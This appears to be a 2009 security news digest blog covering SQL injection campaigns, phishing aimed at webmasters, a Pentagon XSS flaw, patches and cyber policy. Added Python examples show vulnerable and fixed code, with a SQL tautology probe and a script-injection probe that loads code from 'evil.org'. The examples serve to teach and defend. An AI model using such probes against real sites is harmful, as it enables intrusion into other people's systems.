People who visit infected pages receive an invisible link that pulls code from a series of sites tied to 318x .com. The code looks for insecure versions of Adobe Flash, Internet Explorer, and several other Microsoft applications, and when they are detected it exploits them to surreptitiously install malware known as Backdoor.Win3.Buzus.croo. The rootkit-enabled program logs banking credentials and may do other nefarious bidding, Landesman said.

At the moment, about two percent of the requests ScanSafe sees are for sites infected by the malicious link, an indication the threat is significant, Landesman said.

SQL injection attacks prey on web applications that fail to adequately inspect user supplied input before passing it off to a webserver's backend database. They are a favorite way of adding malicious links and content to third-party websites and were also the chink that allowed Albert Gonzalez and other hackers the toehold they needed to steal more than 130 million credit card numbers from card processor Heartland Payment Systems and four other companies.
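The paragraph above describes the root cause: user input is spliced into SQL text, so a value that contains quotes and operators changes the query rather than merely filling in a value. The following is an added example (not from the article or from ScanSafe) that puts the flaw beside its fix using Python's built-in sqlite3 driver. The table, its three rows and the probe string are constructed for the example.

```python
import sqlite3


def build_db():
    """Create an in-memory table with constructed sample rows (not from the article)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO pages (title, body) VALUES (?, ?)",
        [
            ("home", "<p>Welcome</p>"),
            ("about", "<p>About us</p>"),
            ("contact", "<p>Contact</p>"),
        ],
    )
    conn.commit()
    return conn


def find_vulnerable(conn, title):
    """Builds the query by concatenation: the caller's input becomes SQL syntax."""
    sql = "SELECT id, title FROM pages WHERE title = '" + title + "'"
    return conn.execute(sql).fetchall()


def find_safe(conn, title):
    """Parameterised query: the driver passes the input as data, never as SQL."""
    sql = "SELECT id, title FROM pages WHERE title = ?"
    return conn.execute(sql, (title,)).fetchall()


# Constructed probe: a value that is harmless as data but, when concatenated into
# the WHERE clause, turns the condition into a tautology and returns every row.
PROBE = "x' OR '1'='1"


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable, normal input:", find_vulnerable(conn, "home"))
    print("vulnerable, probe input: ", find_vulnerable(conn, PROBE))
    print("safe, probe input:       ", find_safe(conn, PROBE))
```

The same probe returns all three rows from the concatenated query and nothing from the parameterised one, because a bound parameter can only ever be compared against the title column, never interpreted as part of the statement. Input inspection, which the article mentions, is a second layer; parameterisation is the one that removes the bug class.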

The fingerprints on this latest attack lead Landesman to believe the perpetrators are new to the SQL injection game. More sophisticated mass attacks using the method, such as the Gumblar infection, inject unique, dynamically-generated links that prevent researchers from being able to locate them using web searches.

Gumblar also uploads exploits directly to infected sites, which greatly complicates white hat efforts to clean up the mess. Rather than shutting down a single site that's hosting the malware, thousands of mom and pop sites must be disinfected one at a time.

"I'm not convinced SQL injection is the method they're most accustomed to," Landesman said of the gang behind the most recent mass infection. "It's almost as if they're a seasoned attacker but this is their first foray into managing a wide-scale web attack."

Wednesday, 9 December 2009

Hackers Target Webmasters cpanel login Phish

Fraudsters are targeting webmasters in a massive phishing campaign that attempts to trick marks into giving up credentials needed to administer their sites.

The emails are sent to customers of some of the world's most widely used webhosts, including GoDaddy, Hostgator, Yahoo!, and 50Webs. Although the subject lines vary, they all purport to come from the hosting service. In all, admins from at least 90 different webhosts are being targeted.

"Due to the system maintenance, we kindly ask you to take a few minutes to confirm your FTP details," the emails state.

Those who take the bait are led to a website formatted to look like a page from cPanel, the widely used website administration program. Once a website's address and FTP credentials are entered, users are directed to their host's login page.

Over the past year, scammers have increasingly targeted administrators of legitimate websites. According to a review in the third quarter of this year by security firm Dasient, 5.8 million pages from 640,000 websites were infected with code designed to launch malware attacks on visitors. ScanSafe, a separate security firm, has been tracking a single infection known as Gumblar that's taken over at least 2,000 websites by stealing their administrator credentials.

The latest phishing campaign was uncovered by Gary Warner, the director of research in computer forensics at the University of Alabama at Birmingham. It's unclear if it has any relation to Gumblar or what exactly happens to a site whose admin has fallen for the scam. His report is here.

Avast's Human error!

Popular free of charge anti-virus scanner Avast went berserk late last week and began classifying legitimate files as infected.

Legitimate products were wrongly classified as harbouring the Dell-MZG Trojan or other strains of malware and whisked off to quarantine following the publication of a dodgy update. Avast has published a new update that eliminates the wrongful classification glitch. However, that still leaves users who applied the earlier update with borked systems.

False positives are a well known shortcoming of anti-malware scanners. Avast's snafu last Thursday was only unusual because it classified a large number of legitimate programmes as malign. Software from Adobe, Realtek sound card drivers and various media players were all affected.

Avast has published an apology for the cock-up and advice on restoring systems in a blog post (here) and its forum (here).

The anti-virus firm blamed "human error" for the mix-up.

Adware touts $1 bribe to prospective zombies

An adware distributor is offering to pay punters $1 to install their crud.

The bribe comes attached to malware, specifically an application bundle that includes adware and agents that change browser home pages, detected by Sunbelt Software as C4DLMedia and classified as a medium risk threat. The offer of payment is buried in the application's terms and conditions.

Even if the adware slingers come through on this offer to pay via PayPal, the amount of the bribe is probably a problem. "In places where a dollar is worth enough to make this worth the effort, there probably isn’t any internet connectivity," writes Sunbelt security researcher Tom Kelchner.

Sunbelt's blog contains a screenshot illustrating C4DLMedia's terms and conditions here.

Even though $1 barely stretches to a pint of milk these days, the price on offer from C4DLMedia (taken at face value) appears high. Pay-per-install malware affiliates typically earn far, far less. Recent research found that malware affiliates might earn only $140 per 1,000 US-based machines they infect, between $30 and $110 for Western European infections and just $6 per 1,000 infected computers located in Asia.

TJX Hacker to Plead Guilty to Heartland Breach

By Kim Zetter
Threat Level
Wired.com
December 8, 2009

Admitted TJX intruder Albert Gonzalez has entered into a plea agreement
on charges that he hacked into Heartland Payment Systems, Hannaford
Brothers, 7-Eleven and two other unnamed national retailers.

The revelation comes in a filing made by Gonzalez's attorney in U.S.
District Court in New Jersey, where the Heartland charges were filed in
August.

A federal judge on Tuesday officially transferred the New Jersey case to
Massachusetts, where Gonzalez is seeking to merge it with two other
cases in which he’s already pleaded guilty.

Gonzalez, a former Secret Service informant known by the online nicks
"segvec" and "Cumbajohnny," was charged in New Jersey in August, along
with two unnamed Russian hackers. They were accused of stealing more
than 130 million debit and credit cards from card-processing company
Heartland and the other target companies.

Gonzalez and 10 others were also charged in May 2008 in New York and in
August 2008 in Massachusetts with network intrusions into TJX,
OfficeMax, Dave & Busters restaurant chain and other companies. Gonzalez
pleaded guilty to these charges in August and was scheduled to be
sentenced in Massachusetts on Dec. 21 in both cases.

Hacker Exposes Unfixed Security Flaws In Pentagon Website

By Kelly Jackson Higgins
DarkReading
Dec 08, 2009

A Romanian hacker has posted a proof-of-concept attack exploiting
vulnerabilities on the Pentagon's public Website that were first exposed
several months ago and remain unfixed.

The hacker, who goes by Ne0h, demonstrated input validation errors in
the site's Web application that allow an attacker to wage a cross-site
scripting (XSS) attack. The XSS vulnerability had been previously
disclosed by at least two other researchers several months ago -- and
Ne0h's findings show the bug is still on the site.

The site, which is run by the Office of the Assistant Secretary of
Defense for Public Affairs, is basically a tourist site for the Pentagon
and doesn't appear to house any sensitive data. But a security
researcher who studied Ne0h's work says the Pentagon Website could
be used to redirect users to a malicious site posing as the Pentagon
site.

Daniel Kennedy, partner with Praetorian Security Group, says the session
ID appears to be a tracking cookie, and JavaScript can be injected into
the page itself to redirect a user to another site, for instance. "Since
I can pass that page a reference to an external JavaScript, I can do
most anything I can do in JavaScript," says Kennedy, who blogged about
the find yesterday. "That includes basic stuff, like crafting a URL to
send to users that appears to be from the Pentagon, but actually
redirects to 'evil.org,'" for example, he says.
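Kennedy's description covers two distinct weaknesses: a parameter reflected into the page without output encoding (which lets a reference to external JavaScript be injected) and a redirect that will follow any destination it is handed. The following is an added example (not from the article, DarkReading or Praetorian) showing the vulnerable rendering beside an encoded version, plus an allow-list check for redirect targets. The page template, the probe string and the allow-listed host "pentagon.example" are placeholders constructed for the example; "evil.org" is the hostname Kennedy uses above.

```python
import html
from urllib.parse import urlparse

# Constructed page fragment: a session identifier reflected into the HTML body.
TEMPLATE = "<p>Session: {sid}</p>"

# Constructed probe: a reference to an external script, the kind of input the
# article says the reflected parameter accepted.
PROBE = '<script src="//evil.org/x.js"></script>'

# Placeholder allow-list of hosts the site may redirect to (not the real domain).
ALLOWED_HOSTS = {"pentagon.example"}


def render_vulnerable(session_id):
    """Reflects the parameter verbatim, so markup in the input is parsed as markup."""
    return TEMPLATE.format(sid=session_id)


def render_safe(session_id):
    """Output-encodes the parameter: < > & " ' become entities and render as text."""
    return TEMPLATE.format(sid=html.escape(session_id, quote=True))


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """Accept only same-site relative paths or http(s) URLs on an allow-listed host.

    Protocol-relative targets such as //evil.org/ are rejected because urlparse
    gives them an empty scheme but a non-empty netloc.
    """
    parsed = urlparse(target)
    if parsed.scheme == "" and parsed.netloc == "":
        return target.startswith("/") and not target.startswith("//")
    return parsed.scheme in ("http", "https") and parsed.netloc.lower() in allowed_hosts


if __name__ == "__main__":
    print(render_vulnerable(PROBE))
    print(render_safe(PROBE))
    for candidate in ("/visitors/tours", "https://pentagon.example/tours",
                      "https://evil.org/", "//evil.org/", "javascript:alert(1)"):
        print(f"{candidate!r}: {'allowed' if is_safe_redirect(candidate) else 'blocked'}")
```

Encoding at the point of output is what closes the injection; the redirect allow-list closes the "URL that appears to be from the Pentagon but lands elsewhere" case even when the page otherwise behaves.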

Microsoft plugs zero-day IE hole

By Elinor Mills
InSecurity Complex
CNet News
December 8, 2009

Microsoft released fixes on Tuesday for critical vulnerabilities in
Internet Explorer, including one for which exploit code has been
released.

Adobe, meanwhile, was scheduled to release a critical update affecting
Flash Player and Adobe AIR, following news of exploit code being
released for a vulnerability in Illustrator CS3 and CS4 on Windows and
Mac last week.

Microsoft's regular Patch Tuesday release includes six security
bulletins addressing 12 vulnerabilities in IE, Windows, Windows Server,
and Office.

However, priority should be given to the cumulative IE bulletin, which
affects all major Windows versions including Windows 7, IE 6, IE 7, and
IE 8. The bulletin fixes five holes that could allow an attacker to
remotely take control over a system in drive-by download attacks. The
fix also addresses a problem with ActiveX controls built with Microsoft
Active Template Library (ATL) headers that could allow remote code
execution.

"Vulnerabilities in IE are generally pretty serious because all you have
to do is go to a Web page or get referred to one" that has malicious
code on it, said Jason Avery, manager of the Digital Vaccine service at
Tipping Point. Three of the IE holes were disclosed through Tipping
Point's Zero Day Initiative program over the summer, he said.

Hacker charges $43,000 in calls to Buffalo Grove firm's phone

By KATHY ROUTLIFFE
Pioneerlocal.com
December 8, 2009

"Reach out and trick someone" could be the slogan of a hacker who
charged $43,000 in telephone calls -- mostly to Cuba -- to a Buffalo
Grove worker's company phone within a period of days.

Police reported that an employee at RMS Technologies, 1359 N. Barclay
Blvd., became aware someone had hacked into the phone system to make
free calls after his phone service carrier warned of the unusual
activity between Oct. 9 and 12.

"As far as how the technology works to rack up that many calls, we don't
know,” police Cmdr. Steven Husak said Monday. "(The employee's) phone
carrier alerted him to the situation, and he thought he had resolved it
until he received the bill."

Tuesday, 8 December 2009

White House security 'breached 91 times since 1980'

By Giles Whittell in Washington
The Times
December 8, 2009

If the would-be celebrities who crashed a White House state dinner knew
what the Secret Service knew they might not even have bothered to dress
up.

According to a devastating internal review leaked after Tareq and
Michaele Salahi strolled into the banquet for the Indian Prime Minister
without a ticket, there have been at least 91 breaches of Secret Service
security in the past 30 years, including at least four by a serial
intruder who believes that God has made him undetectable to bodyguards.

It turns out that the men who talk into their cuffs are only human. A
family of four once penetrated the White House security cordon simply by
honking on the horn of their minivan. Five years later an intruder
nicknamed the Paper Boy drove through an open White House gate
unchallenged and gave a Secret Service agent a pair of handcuffs before
he was himself arrested.

In 2003 a stowaway flew several thousand miles across Africa aboard Air
Force One without credentials, claiming when apprehended that he had
brought weapons on to the presidential jet, and four times between 1991
and 2003 the Rev Richard "Rich" Weaver shook hands with presidents he
was not cleared to meet. On at least two of those occasions Mr Weaver
managed to give the Commander in Chief a souvenir of his supposedly
divine mission.

[...]

HSBC exposed sensitive bankruptcy data

By Robert McMillan
IDG News Service
December 4, 2009

HSBC Bank says a bug in its imaging software inadvertently exposed
sensitive data about some of its customers going through bankruptcy
proceedings.

In notification letters made public Thursday, the bank said it had
redacted sensitive information in Chapter 13 bankruptcy proof-of-claim
forms that were filed electronically, but that the information turned
out to be viewable "as a result of the deficiency in the software used
to save imaged documents."

An HSBC spokeswoman declined to elaborate on the cause of the problem,
but said "a limited number of customers" were affected. HSBC has "no
reason to believe customers' personal information may have been
compromised," she added via e-mail. The company sent letters to affected
customers in October and is offering them one year of free credit
monitoring.

Some customers of the following HSBC companies are affected: HSBC
Taxpayer Financial Services, Beneficial New Hampshire and Household
Finance Corporation.

[...]

PayPal mistakes own email for phishing attack

By John Leyden
The Register
4th December 2009

Banks and financial institutions are fond of lecturing customers about
the perils of phishing emails, the bogus messages that attempt to trick
marks into handing over their login credentials to fraudulent sites. Yet
many undo this good work by sending out emails themselves that invite
users to click on a link and log into their account rather than going a
safer route and telling users to use bookmarked versions of their site.

The problems of the former approach are neatly illustrated by a blog
posting by Randy Abrams, a former Microsoft staffer who is now director
of technical education at anti-virus firm Eset. Abrams complained about
the inclusion of a link in an email from PayPal as it looked rather too
much like a phishing email.

PayPal support staffers responded not by noting that Abrams may have a
point, which it would consider, but by treating its own email - which it
acknowledged was "suspicious-looking" - as a phishing attack.

"Not even PayPal support can tell the difference between a legitimate
PayPal email and a phishing attack," Abrams notes.

[...]

New cloud-based service steals Wi-Fi passwords

By Robert McMillan
IDG News Service
December 7, 2009

For $34, a new cloud-based hacking service can crack a WPA (Wi-Fi
Protected Access) network password in just 20 minutes, its creator says.

Launched today, the WPA Cracker service bills itself as a useful tool
for security auditors and penetration testers who want to know if they
could break into certain types of WPA networks. It works because of a
known vulnerability in Pre-shared Key (PSK) networks, which are used by
some home and small-business users.

To use the service, the tester submits a small "handshake" file that
contains an initial back-and-forth communication between the WPA router
and a PC. Based on that information, WPA Cracker can tell whether the
network seems vulnerable to this type of attack.

The service was launched by a well-known security researcher who goes by
the name of Moxie Marlinspike. In an interview, he said that he got the
idea for WPA Cracker after talking to other security experts about how
to speed up WPA network auditing. "It's kind of a drag if it takes five
days or two weeks to get your results," he said.

TSA Leaks Sensitive Airport Screening Manual

By Kim Zetter
Threat Level
Wired.com
December 7, 2009

Who needs anonymous sources when the government is perfectly capable of
leaking its own secrets?

Government workers preparing the release of a Transportation Security
Administration manual that details airport screening procedures badly
bungled their redaction of the .pdf file. Result: The full text of a
document considered "sensitive security information" was inadvertently
leaked.

Anyone who's interested can read about which passengers are more likely
to be targeted for secondary screening, who is exempt from screening,
TSA procedures for screening foreign dignitaries and CIA-escorted
passengers, and extensive instructions for calibrating Siemens
walk-through metal detectors.

The 93-page document also includes sample images of DHS, CIA (see above)
and congressional identification cards, with instructions on what to
look for to verify an authentic pass.

The manual, titled Screening Management Standard Operating Procedure, is
dated May 28, 2008. It contains this warning: "NO PART OF THIS RECORD
MAY BE DISCLOSED TO PERSONS WITHOUT A 'NEED TO KNOW.'"

Notwithstanding that disclaimer, the document appeared on FedBizOpps, a
government clearinghouse that lists federal contracting opportunities
for vendors. It has since been removed from the site, but not before
someone grabbed it and submitted it to the whistleblower site Cryptome,
where the formerly-redacted portions are highlighted in red boxes. The
discovery was first made by a blogger at Wandering Aramean.

[...]

Friday, 4 December 2009

Engineers who hacked into L.A. traffic signal computer, jamming streets, sentenced

By Shelby Grad
Los Angeles Times
December 1, 2009

Two L.A. traffic engineers who pleaded guilty to hacking into the city's signal system and slowing traffic at key intersections as part of a labor protest have been sentenced to two years' probation.

Authorities said that Gabriel Murillo, 40, and Kartik Patel, 37, hacked into the system in 2006 despite the city's efforts to block access during a labor action.

Fearful that the strikers could wreak havoc, the city temporarily blocked all engineers from access to the computer that controls traffic signals.

But authorities said Patel and Murillo found a way in and picked their targets with care -- intersections they knew would cause significant backups because they were close to freeways and major destinations.

Crooks 'too lazy' for crypto

By Chris Williams
The Register
3rd December 2009

The widespread use of encryption by criminals - long feared by intelligence and law enforcement agencies - has yet to materialise, according to the man in charge of the country's largest digital forensics unit.

Mark Stokes, head of the Metropolitan Police's Digital and Electronic Forensic Services (DEFS), told The Register that "literally a handful"
of the tens of thousands of devices it handles each year from across the whole of London involve encrypted data.

"We're still to this day not seeing widespread use of encryption," he said.

Despite the availability of scrambling products such as PGP, TrueCrypt and Microsoft's BitLocker, criminals are not making life difficult for forensic investigators to access their files.

"You'd think paedophiles would use it, but they don't. It's just human nature to think they'll never get caught," said Stokes, an electronics

Cisco, Juniper vulnerable to hacking

By Reuters
3 Dec 2009

The US government has identified flaws in equipment from four companies, including Cisco Systems, that hackers can exploit to break into corporate computer networks.

The Department of Homeland Security's US Computer Emergency Readiness Team, US-CERT, said on its Web site that the warning applies to certain networking products from Cisco, Juniper Networks, SonicWall and SafeNet.

The flaw applies to equipment with technology known as SSL VPN that companies use to set up secure communications systems for safely accessing internal computer systems over the Internet.

It affects VPN systems run directly through a Web browser, rather than through software installed on a user's PC, which is more widely used.

Hackers who exploit the vulnerability could gain broad access to corporate networks, then steal confidential data, install malicious software or turn PCs into spam servers.

A Call to Cyber Arms

By Maryann Lawlor
SIGNAL Scape
The official blog of
AFCEA International
and SIGNAL Magazine
12/02/09

Sherri Ramsay, director of the NSA's Central Security Service Threat Operations Center, opened AFCEA's SOLUTIONS Series today by admitting that the intersection of cyber, national and economic security has changed the way her organization interacts with industry. Citing statistics that cybercrime has cost individuals more than $2 billion, Ramsay called for shared network situational awareness across the U.S.
government, industry and individuals. This holistic approach must include information about who owns, operates and defends the networks, she said.

"Cyberspace at the Cross Roads: The Intersection of Cyber, National and Economic Security," is the third in this year's SOLUTIONS series of forums and is taking place December 2-3 at the National Conference Center. The event features presentations by military and government leaders as well as three tracks of panel sessions that are designed to prompt discussions among attendees.

Despite the need for a holistic approach to cybersecurity, Ramsay acknowledged that determining how to do it poses many challenges. She related that while discussing cyber defense with her counterparts in New Zealand, she described the change in tactics as the difference between playing football and playing soccer. While the former involves offensive and defensive teams taking the field separately, the latter calls on offensive players to go on the defense as soon as possession of the ball changes sides. The New Zealanders agreed that a change has taken place but said that cyber defense today more resembles rugby.

Ramsay called on government, industry and individuals to be more proactive in their part of cybersecurity. To this end, the NSA now uses the term "Team Cyber" every day to describe how it is enacting cyber defenses. Members of the team include the government, industry and academia to such an extent that the NSA has actually brought antivirus vendors into the same room with government network defenders to observe networks under attack. The vendors were then given the information and signatures they would need to improve the next version of their products.

Cyber Warfare Command to Be Launched in January

By Jung Sung-ki
Staff Reporter
The Korea Times
12-01-2009

The Ministry of National Defense will launch a cyber warfare command next month, officials said Tuesday.

The command will conduct both defensive and offensive cyber operations under the direction of the defense minister, they said.

Previously, the ministry had been considering establishing a cyber command under the control of the Defense Security Command (DSC), whose mission is to defend military networks against computer attacks.

The command will be led by a major general and have 200 specialists, the officials said.

Earlier this year, the DSC said the country's military computer networks faced about 95,000 reported hacking attacks per day on average.

In July, the government and industrial computer networks suffered from massive distributed denial of service (DDoS) attacks for several days.

Some intelligence sources from South Korea and the United States blamed North Korea for the attacks, though no solid evidence has been found to support those claims.

North Korea is known to operate a cyber warfare unit that specializes in hacking into South Korean and U.S. military networks to extract classified information.

Metasploit Gets New Vulnerability Scanning Features

By Kelly Jackson Higgins
DarkReading
Dec 01, 2009

A new version of Metasploit released today includes integrated vulnerability scanning for the popular open source penetration testing tool.

Rapid7, which recently purchased Metasploit, today announced both the new version of Metasploit, 3.3.1, as well as a new free version of Rapid7's NeXpose vulnerability scanner. The NeXpose Community Edition is basically a slimmed-down version of the company's enterprise-class scanner that's limited in the number of IPs it can scan.

The free NeXpose version is integrated with Metasploit 3.3.1 with a plug-in to the Metasploit console. "This integration is the first to actually run the [vulnerability] scan and do the import of the data for you," says HD Moore, chief security officer for Rapid7 and creator of Metasploit. It lets the penetration tester run the scan, import the data, and automatically run exploits against the vulnerabilities, he says.

"This is the first step in the integration" of Metasploit and the NeXpose vulnerability scanning platform, Moore says. The tools work together from the Metasploit console with a command-line plug-in: the penetration tester loads Metasploit, connects to NeXpose, and runs the scan from there. The scan data is then brought in to Metasploit and cross-referenced with Metasploit's modules, which then are automatically launched to test out the vulnerabilities, he says. "The whole process is from the Metasploit console," he says.

Wanted: A Smokey Bear for cybersecurity

By Amber Corrin
FCW.com
Dec 02, 2009

Cybersecurity has become more than a homeland security issue; it has become a national lifestyle issue that hinges on raising education at the individual level, a panel of information security experts said today.

"If the U.S. is going to continue to be a center of innovation in the world, we need to up our game and get on par with the science, engineering and technology schooling of China and India," according to Richard Schaffer, information assurance director at the National Security Agency.

"It's a U.S. problem; it's a challenge that, [if left] unmet, is going to put us in a dangerous situation in 10 or 20 years when we can't afford to be in second place. We never want to be in second place," Schaffer added.

Beyond formal education, U.S. cybersecurity strategy needs to develop a public awareness campaign that permeates the workplace, schools and homes -- much like the development of Smokey Bear in the 1970s to promote fire safety, panelists said.

"This [campaign] needs to include secretaries, administrators, front-line people who have no idea [about technology and cyberspace] - not just front line cyber operators," said Adam Meyers, an SRA International information assurance principal who currently works with the State Department.

The Fruit of the Poisoned Tree

By M. E. Kabay
Network World
12/02/2009

Should we hire criminal hackers as security experts? This is the second of a two-part attack on the idea from a 1995 debate in which I participated.

* * *

On a broader scale, consider the message you would be giving some thirteen year old proto-hacker. These kids, like most kids, are tremendously susceptible to peer pressure. They already find criminal hacking attractive because it's viewed as today's counter-culture -- something fairly harmless (compared with, say, dealing drugs) but exciting because it's illegal. Now imagine that the older creeps can announce that they've just been hired by The Man (i.e., authority figures) to work in counter-intelligence, snooping in foreign companies' files for money (you don't imagine they'd keep it quiet, do you?) -- Oh man -- not only is criminal hacking glittering with the allure of the forbidden now, but you can hope to earn money with it from the government!

The children and emotionally-arrested adolescents involved in criminal hacking already have a love/hate attitude towards The Man. Many of them claim that they'd like to work for security firms when (if) they grow up. This myth that criminal hacking is a reasonable basis for work in security would become even more pernicious if it were known that more hackers had in fact been solicited and used by government or corporate organizations. Using such people would reinforce the attractiveness of criminality.

Consider the outcry if the military in a democracy actively solicited murderers to be soldiers. The great challenge of military training is to temper savagery with honor; to provide a moral framework within which war is viewed as undesirable, killing as regrettable. A soldier who lies is a stain on his unit's honor. A soldier who steals is a wretch who deserves expulsion. And a soldier who breaks his word is a traitor to his country. And so how shall we deal with people whose entire way of life is to lie and to steal and to cheat?

Tuesday, 1 December 2009

Priyanka's twitter update could be security threat

[Ankit Fadia, India's uber hacking expert, appears to heavily promote Viagra, or has been hacked by evil spammers that found a way to subtly deface the web page. - http://attrition.org/errata/sec-co/fadia01.html - WK]


By Kumar Saurav
Mid Day
2009-11-23
Mumbai

Not just Priyanka Chopra, but any celebrity or public figure's Twitter updates can jeopardize national security, claims 24 year-old ethical hacker Ankit Fadia.

Mumbai-based cyber security consultant Ankit Fadia, who claims that his website Hacking Truths was judged as the second best hacking site in the world by the FBI, says social networking sites are the latest threat to India's security. The potency and penetration of social networking in the country has made it possible for anyone to track and connect with film stars, politicians and other public figures who were once beyond reach.

Karan Johar, Priyanka Chopra, Aishwarya Rai, Shashi Tharoor and Barack Obama are just a few from a whole bunch of celebrities who update their Twitter status regularly. But "are they doing it wisely?" is what Fadia asks.


Why are you apprehensive about celeb tweeting?

If you follow celebs, you'll observe that they disclose information on where they are shooting, what their shooting schedule looks like and the hotel they are put up at. Unintentionally, they are inviting trouble, because troublemakers are hungry for such information.


Any instances?

Singer Britney Spears' account on Twitter is hacked almost once every two months. One of the hackers even claimed on her wall that he's her public relations officer and that Britney is dead, with details about the date and venue of her funeral.

Indian politico Shashi Tharoor's account has been hacked several times too. Even Big B and Aamir Khan's blogs were hacked. Once a blog, website or social networking account is hacked, a hacker has full control over it. He can spread rumours, communicate with fellow criminals, and indirectly make you a partner in their crime.


How would you rate the technical stylishness of terrorists?

They are far ahead. When I was asked by the US intelligence to decode some scripts after the 9/11 attacks, I was stunned to see the kind of technology they used to communicate. The agencies had tracked some emails where a few individuals were frequently exchanging photographs of Canadian rockstar Avril Lavigne. Hidden text messages that aren't visible to the naked eye, were being exchanged through these pictures.


What about Mumbai's 26/11 terror attacks?

For 26/11, they had used highly secured Voice Over Internet Protocol (VOIP) like Skype to communicate with each other. The data on VOIPs' servers is so huge that by the time you track them, the damage has been done and criminals are out of reach. The 26/11 terrorists had used the "proxy bouncing" technique, wherein they were sending messages through a Saudi Arabia based server, while they were actually sitting in Pakistan.


Why is tracking such messages so difficult?

They know the loopholes, and how to use them effectively. Suppose three terrorists A, B and C want to communicate with each other, what they do is create a Twitter account and follow each other, thus forming a closed group. So if A posts a message saying "Plant Bomb at Parliament at 11 am", just B and C will be able to see the message. And since Twitter is based in the US, Indian authorities wouldn't have control over this exchange of messages.

Tracking messages is another problem. I will track a suspicious mail only if it's sent. If A wants to communicate with B, he will type an email and save it as a draft instead of sending it. Now B, who has A's password, will log in to A's account and read the mail in the "Draft" folder. Since the mail hasn't been sent, it becomes almost impossible to track it.


How do spammers and hackers operate in social networking sphere?

There are viruses, worms, spyware and malware that spread through social networking websites. One day, you receive a private message from one of your friends (who is already infected) containing a link to a Youtube video. Halfway through the video, it will prompt you to download some video plugin. Since the message comes from your friend, you trust it, but the moment you click it, you get infected. Get rich quick schemes, earn money online scams and various money laundering attacks now come through social networking sites.

Cyber crime danger

The Police Force has forecast cyber crimes to increase by 40 to 50 per cent from 2010 to 2012.

Jemesa Lave of the police cyber crime unit said in these two years, it was anticipated that more complicated technological crimes would be perpetrated in Fiji.

Coupled with this, he said was the anticipated shift from conventional criminal operations to cybercrime.

"We need legislation, we need to ensure that standards are put in place to address computer crime issues," Mr Lave said.

He said people needed to be aware that computer crimes knew no borders.

Mr Lave said the major challenge for Fiji was having implemented legislations to cover this.

He said at present, the police had some degree of capability to detect and investigate recently enacted decrees to ensure offenders were brought to decide.

At the cyber crime unit, there are 13 INTERPOL trainers in IT crime investigation, two certified computer forensics specialists, computer forensics specialists, one certified application forensics specialist, and one certified mobile forensics specialist.

Mr Lave said 70 per cent of the reports they received had been investigated by CID headquarters.

The nation needs a clear cyber war doctrine

By William Jackson
GCN.com
Nov 30, 2009

A recent study from McAfee on cyber crime and cyber warfare concluded that, like it or not, the world's information infrastructures are becoming theaters of war, as nations develop offensive and defensive capabilities to wage cyber warfare.

"Cyber weapons exist, and we should expect that adversaries might use them," said James Lewis, director of the Technology and Public Policy program at the Center for Strategic and International Studies. Lewis is one of 2,000 national and cybersecurity experts who were interviewed for the study.

The threat of cyber war is not comforting, but more disturbing is the fact that we do not know how to use the weapons we are developing. Our ability to defend ourselves and to take the struggle to our enemies is hindered by the difficulty in understanding the sources and motives behind what might be considered hostile action against our networks and systems. Unlike attacks by conventional and nuclear military weapons, cyber attacks tend to be asymmetrical, remote and hidden. It is difficult to tell who is behind an attack and what its objective is.

It is easy to blame North Korea or China for intrusions that seem to be launched from computers in those countries, but the location of a computer or network launching an attack says little about who is behind it.

CERT Australia pushes on network security

By Karen Dearne
The Australian
December 01, 2009

The new computer emergency response team, CERT Australia, will expect internet service providers to be more active in cleaning up infected computers operating on their networks.

Following the federal government's e-security review last year, the Internet Industry Association has been hammering out a voluntary ISP code of practice aimed at identifying botnet activity and alerting customers to security breaches.

Attorney-General's Department national security resiliency division head Mike Rothery said CERT Australia would be a two-way clearing house for notifications from local and international authorities, with responsibility for tracking down compromised machines in Australian domains.

"We'll be establishing relationships with our CERT counterparts so that if we identify (attacks coming from) compromised machines overseas, we can ask those authorities to trace the actual owners and seek that those be cleaned up," Mr Rothery said.

"Where identified machines appear to be in Australia -- and the notification may come from overseas or from a local ISP or web hosting company -- we will track down the owners through their ISP or web host and tell them their machines have been compromised.

I Was Wrong: There Probably Will Be an Electronic Pearl Harbor

By Ira Winkler
CSO
November 29, 2009

For 15 years now, I have been publicly lambasting all of those people who have made their careers, or at least made fleeting news headlines, based on their declaration of an imminent Electronic Pearl Harbor. My disdain is based on several factors, but predominantly the lack of accountability for such statements. One industry analyst, for example, stated that there will be such an event by the end of 2003. Six years later, I didn't see anyone revisit the utter lack of such an event.

However, I now see things developing to the point where there can be a strategic attack on computer infrastructures. The key word is Strategic.

Another major issue I have with the people who stake their fame in information warfare is the lack of apparent understanding in the concept of military and geopolitical issues. Specifically, strategy implies long term impacts, generally at least 3-6 months. Tactical attacks have short term impacts. Yes, we have had many tactical attacks against different infrastructures. However, comparing these attacks to Pearl Harbor is insulting.

Pearl Harbor was a preemptive strike against the US Pacific Fleet. It significantly degraded the US Naval capability for several years. If the aircraft carriers were in Pearl Harbor as the Japanese expected, it could have been a complete knockout blow. So the question becomes, what can make a computer attack strategic?

[...]

Gilbert man loses job in case tied to alien-search software

By Emily Gersema
The Arizona Republic
Nov. 30, 2009

The search for intelligent life apparently has stopped for Brad Niesluchowski.

Higley Unified School District records obtained by The Arizona Republic show that Niesluchowski, of Gilbert, resigned in October after an investigation into suspicious activity, including the use of a program that searches satellite signals for extraterrestrial life.

According to the documents, district officials said they found Niesluchowski had abused his authority in purchasing and oversight of district technology and equipment, and downloaded to every district computer a University of California-Berkeley program that relies on volunteers and their personal computers to search satellite-collected data for signs of intelligent life in outer space.

Higley officials so far estimate the damages, energy usage and equipment losses linked to Niesluchowski at $1.2 million to $1.6 million.

District administrators hand-delivered a notice of termination of contract for cause to Niesluchowski on Oct. 7, which he refused to sign. He instead consulted an attorney, and then resigned at the attorney's advice.

According to the termination letter, Niesluchowski faces several allegations that he violated the terms and responsibilities of his contract and ethics policies - and is the focus of a criminal investigation. Documents show:

* During a warranted search of his home earlier this fall, Gilbert police found 18 computers and other equipment stolen from the district.

* District officials said they learned Niesluchowski never installed firewalls that would protect students' and staff members' personal information from hackers, exposing district computers and data to potential tampering or damage.

* District officials also say he failed to train and supervise other tech staff.

* Officials allege he downloaded to every district computer a University of California-Berkeley program known as "SETI@home." SETI is short for the "Search for Extra Terrestrial Intelligence."

Restaurants Sue Vendor for Unsecured Card Processor

By Kim Zetter
Threat Level
Wired.com
